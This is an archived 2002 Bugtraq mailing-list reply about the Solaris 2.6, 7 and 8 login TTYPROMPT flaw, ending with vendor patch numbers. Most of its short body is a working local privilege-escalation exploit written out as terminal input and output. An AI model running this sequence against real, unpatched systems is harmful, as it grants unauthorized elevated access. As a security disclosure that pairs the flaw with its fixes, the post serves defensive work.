[27272] in bugtraq
Re: Solaris 2.6, 7, 8
daemon@ATHENA.MIT.EDU (Dan Diamond)
Thu Oct 3 15:38:51 2002
Date: 3 Oct 2002 16:03:06 -0000
Message-ID: <20021003160306.25187.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Dan Diamond <dan.a.diamond@mail.sprint.com>
To: bugtraq@securityfocus.com
In-Reply-To: <80010803375300.04448@localhost.localdomain>
This exploit can also be done local to gain higher priv's
tester#TTYPROMPT=aaaaaa;export TTYPROMPT
tester#exec login
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c/n
tester:bin#
Patches to resolve are:
2.6 105665-04
2.7 112300-01
2.8 111085-01
